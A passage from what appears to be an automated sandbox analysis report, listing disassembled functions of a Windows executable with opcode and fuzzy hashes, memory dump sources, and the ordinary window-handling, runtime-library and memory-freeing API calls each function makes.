                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71706001349c3364b16b6b5491d79266427021637149d04f3b03230fdf6c7208
                                              • Instruction ID: 745efd2140949c70e8bd8553f1d528f969101626779016c480534dc384f45473
                                              • Opcode Fuzzy Hash: 71706001349c3364b16b6b5491d79266427021637149d04f3b03230fdf6c7208
                                              • Instruction Fuzzy Hash: 8212D2716047078FD728CF68C895BB9B7E0FF45308F148A2EE59AC7282E774A995DB01
                                              Function 00CA46CF Relevance: .3, Instructions: 330COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69c1cebaecb3c964dc56332b8f1616fbeb960f775f2420a0aa0fae4862a005aa
                                              • Instruction ID: 6ce225c87f7588e4c0a038aa835b8de9b112fb7fadc3d9e1be5d8f00bddddcec
                                              • Opcode Fuzzy Hash: 69c1cebaecb3c964dc56332b8f1616fbeb960f775f2420a0aa0fae4862a005aa
                                              • Instruction Fuzzy Hash: 26E14AB55083D58FC344CF29D88566ABBE0BF99300F46095EF9E49B352C334EA16DB62
                                              Function 00CAA222 Relevance: .3, Instructions: 279COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5e20fbda363a406ff6bdb0404c78e0de913a58b678ca25298e7893e6ead81bd
                                              • Instruction ID: cd92f2301d3aad7a732defacf5ebe20f6fb075759920b232044f93cd035b9f8f
                                              • Opcode Fuzzy Hash: c5e20fbda363a406ff6bdb0404c78e0de913a58b678ca25298e7893e6ead81bd
                                              • Instruction Fuzzy Hash: CE9146313083434FDB25DE68C885BAE77D2AB96308F14093CF99A87282DB74D986D753
                                              Function 00CBC0D6 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5ffbb50667f8af0b4aeffa95fe614394d8f4247d2509b1f77cb5384fe6a7e72
                                              • Instruction ID: 89586573d4ad943f5a281907398c185fc8abbdb81b675b6fbef1de96bda9d114
                                              • Opcode Fuzzy Hash: b5ffbb50667f8af0b4aeffa95fe614394d8f4247d2509b1f77cb5384fe6a7e72
                                              • Instruction Fuzzy Hash: 3961657160060867EE389AAC88E6BFF73D8EF55304F50041AE8B3FF292D6519F429756
                                              Function 00CBBEA7 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                              • Instruction ID: a012158e6168ce965fb61d551cc8ffabc5636ae1e607d34d45ceca140099f4a7
                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                              • Instruction Fuzzy Hash: C951CB3520078997EF3499AE88D6BFF27D99B12300F18050AE967CB6A2C7C5DF05E721
                                              Function 00CA4D32 Relevance: .2, Instructions: 171COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76fe5219caaa263e59172cddc2fdfc83bc9c0eec66f83550b55a47f04654e2cc
                                              • Instruction ID: d72ce4f70640e093a938e1046867cdddb9901907b31d7065db25def645c356ca
                                              • Opcode Fuzzy Hash: 76fe5219caaa263e59172cddc2fdfc83bc9c0eec66f83550b55a47f04654e2cc
                                              • Instruction Fuzzy Hash: DB51F1315083964FC715DF28C4845AEFFE0AEDA218F0A499EE1E55B142D230EB4ACB52
                                              Function 00CA5F0B Relevance: .1, Instructions: 148COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 721d4b953a1c6d75b6c6a1d9a7c71ce7cf6a7d097dccb37f17886ebe5f994556
                                              • Instruction ID: 815edc2a76d37388a4a5f9ed7a2e20202c8dda3a577df8243c56610059900d0a
                                              • Opcode Fuzzy Hash: 721d4b953a1c6d75b6c6a1d9a7c71ce7cf6a7d097dccb37f17886ebe5f994556
                                              • Instruction Fuzzy Hash: BB51CDB1A087119FC758CF29D88055AF7E1BF88314F058A2EF899E7740DB30E9598B96
                                              Function 00CAA008 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                              • Instruction ID: 3300cd2660595e3f7b342fcbb3ffb12bcf37711aa5b33848794c6b585015678f
                                              • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                              • Instruction Fuzzy Hash: AC3112B16047069FCB14DF28C85166EBBE0FB96314F104A3DE49AC3342C735E94ADB92
                                              Function 00C97CBA Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                              • Instruction ID: 989fc5aba733741521035ace9047eaa261885f3b98184e658608ac55bcf00ae6
                                              • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                              • Instruction Fuzzy Hash: 5441F630515B11CFC71ADF34E5999A6B7E0FF4A700B1249AFD06A8B231EB30EA04DB59
                                              Function 00CB92D0 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction ID: 9598d4f15a34854031680b977b2ebc953874dc7ad73ad727f8f62907c1b8f5fc
                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction Fuzzy Hash: 551108B724415243D6148A3ED4B46FBB3E9EAC6320F6C427AD3624B6F8D232EB459900
                                              Function 00CA3EAA Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                              • _swprintf.LIBCMT ref: 00CA3EEA
                                                • Part of subcall function 00C9F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C9F6CD
                                                • Part of subcall function 00CA89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00CDE088,?,00000007,00CA33E2,?,?,00000050,9CAA5719), ref: 00CA8A0A
                                              • _strlen.LIBCMT ref: 00CA3F0B
                                              • SetDlgItemTextW.USER32(?,00CD919C,?), ref: 00CA3F64
                                              • GetWindowRect.USER32(?,?), ref: 00CA3F9A
                                              • GetClientRect.USER32(?,?), ref: 00CA3FA6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CA4051
                                              • GetWindowRect.USER32(?,?), ref: 00CA4081
                                              • SetWindowTextW.USER32(?,?), ref: 00CA40B0
                                              • GetSystemMetrics.USER32(00000008), ref: 00CA40B8
                                              • GetWindow.USER32(?,00000005), ref: 00CA40C3
                                              • GetWindowRect.USER32(00000000,?), ref: 00CA40F3
                                              • GetWindow.USER32(00000000,00000002), ref: 00CA4165
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                              • String ID: $%s:$CAPTION$d
                                              • API String ID: 2407758923-2512411981
                                              • Opcode ID: 51f938d85ed5b7f99a26115ab59d63fa6eecabc55d3ddd49114f3dc0b2e52d6d
                                              • Instruction ID: 14b6e796240937b053571c86df7528c3c55a1079f10976a5d5e1014908e374c7
                                              • Opcode Fuzzy Hash: 51f938d85ed5b7f99a26115ab59d63fa6eecabc55d3ddd49114f3dc0b2e52d6d
                                              • Instruction Fuzzy Hash: A1817C72508342AFD714DFA8CD89B6FBBE9EBC9704F00091DFA8997250D774E9098B52
                                              Function 00CB61A7 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 58libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00CE60E0,00000FA0,?,?,00CB6185), ref: 00CB61B3
                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CB6185), ref: 00CB61BE
                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CB6185), ref: 00CB61CF
                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CB61E1
                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CB61EF
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CB6185), ref: 00CB6212
                                              • DeleteCriticalSection.KERNEL32(00CE60E0,00000007,?,?,00CB6185), ref: 00CB6235
                                              • CloseHandle.KERNEL32(00000000,?,?,00CB6185), ref: 00CB6245
                                              Strings
                                              • SleepConditionVariableCS, xrefs: 00CB61DB
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CB61B9
                                              • WakeAllConditionVariable, xrefs: 00CB61E7
                                              • kernel32.dll, xrefs: 00CB61CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 2565136772-3242537097
                                              • Opcode ID: f2d265849079355e4a2927243986f8c7681187ef2a3796b9fb546c05893ee9c1
                                              • Instruction ID: d7b36e9816de52e3d041395d905f15b2a721a32efaf162eaa902c2201d323c29
                                              • Opcode Fuzzy Hash: f2d265849079355e4a2927243986f8c7681187ef2a3796b9fb546c05893ee9c1
                                              • Instruction Fuzzy Hash: 0201F770A50371EBDB201B76EC8DF9E3A6CFB15B81B004425F929D6250DA68C9008A71
                                              Function 00CC37D2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 00CC3816
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC33CE
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC33E0
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC33F2
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3404
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3416
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3428
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC343A
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC344C
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC345E
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3470
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3482
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3494
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC34A6
                                              • _free.LIBCMT ref: 00CC380B
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CC382D
                                              • _free.LIBCMT ref: 00CC3842
                                              • _free.LIBCMT ref: 00CC384D
                                              • _free.LIBCMT ref: 00CC386F
                                              • _free.LIBCMT ref: 00CC3882
                                              • _free.LIBCMT ref: 00CC3890
                                              • _free.LIBCMT ref: 00CC389B
                                              • _free.LIBCMT ref: 00CC38D3
                                              • _free.LIBCMT ref: 00CC38DA
                                              • _free.LIBCMT ref: 00CC38F7
                                              • _free.LIBCMT ref: 00CC390F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 7b44737b1100049393035d55c76f797c686e003a3d47ba58e8ca978ea9f6366f
                                              • Instruction ID: a930cb604dd641765e246542d2d79e26b3a998b25190c3a5a2226d858a8d2b22
                                              • Opcode Fuzzy Hash: 7b44737b1100049393035d55c76f797c686e003a3d47ba58e8ca978ea9f6366f
                                              • Instruction Fuzzy Hash: 61315031504384DFEB21AA79E845F56B3E9EF00310F28846EF468D75A1DE71AE84DB20
                                              Function 00CAD912 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 157memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAD919
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              • _wcslen.LIBCMT ref: 00CAD97B
                                              • _wcslen.LIBCMT ref: 00CAD99A
                                              • _wcslen.LIBCMT ref: 00CAD9B6
                                              • _strlen.LIBCMT ref: 00CADA14
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,00CCD9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00CADA2D
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00CADA54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                              • API String ID: 1185167184-1533471033
                                              • Opcode ID: 38db03d4c030f2d6467441b731acff0f84712c1a36152524742de19d822a77da
                                              • Instruction ID: 2dd7a10a3b2f8645e0c8ab158feeb46656f4525d4decabfe9c07fe0ec3020451
                                              • Opcode Fuzzy Hash: 38db03d4c030f2d6467441b731acff0f84712c1a36152524742de19d822a77da
                                              • Instruction Fuzzy Hash: 48510D71D1021AAFEF04EBA0CC86BEEBBB9AF16314F140029E506BB185DF705E45D7A5
                                              Function 00CB3796 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindow.USER32(?,00000005), ref: 00CB37C4
                                              • GetClassNameW.USER32(00000000,?,00000080), ref: 00CB37F0
                                                • Part of subcall function 00CA8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00CA0E3F,?,?,?,00000046,00CA1ECE,00000046,?,exe,00000046), ref: 00CA8DBA
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB380C
                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CB3823
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CB3837
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CB3860
                                              • DeleteObject.GDI32(00000000), ref: 00CB3867
                                              • GetWindow.USER32(00000000,00000002), ref: 00CB3870
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                              • String ID: STATIC
                                              • API String ID: 3820355801-1882779555
                                              • Opcode ID: b3591ae3fcc051e9f7db1847cf160c719a2d59afadf43840f7231a0c2ba3fd59
                                              • Instruction ID: 51eb0528c50b77eac6e921647486046f02e0845468a032d936668daa20747282
                                              • Opcode Fuzzy Hash: b3591ae3fcc051e9f7db1847cf160c719a2d59afadf43840f7231a0c2ba3fd59
                                              • Instruction Fuzzy Hash: CB2146722443907BE220AF24DC8AFEF779CAF45700F000226FE15AA0D1DB358E0656E6
                                              Function 00CBFF11 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00CBFF25
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CBFF31
                                              • _free.LIBCMT ref: 00CBFF3C
                                              • _free.LIBCMT ref: 00CBFF47
                                              • _free.LIBCMT ref: 00CBFF52
                                              • _free.LIBCMT ref: 00CBFF5D
                                              • _free.LIBCMT ref: 00CBFF68
                                              • _free.LIBCMT ref: 00CBFF73
                                              • _free.LIBCMT ref: 00CBFF7E
                                              • _free.LIBCMT ref: 00CBFF8C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
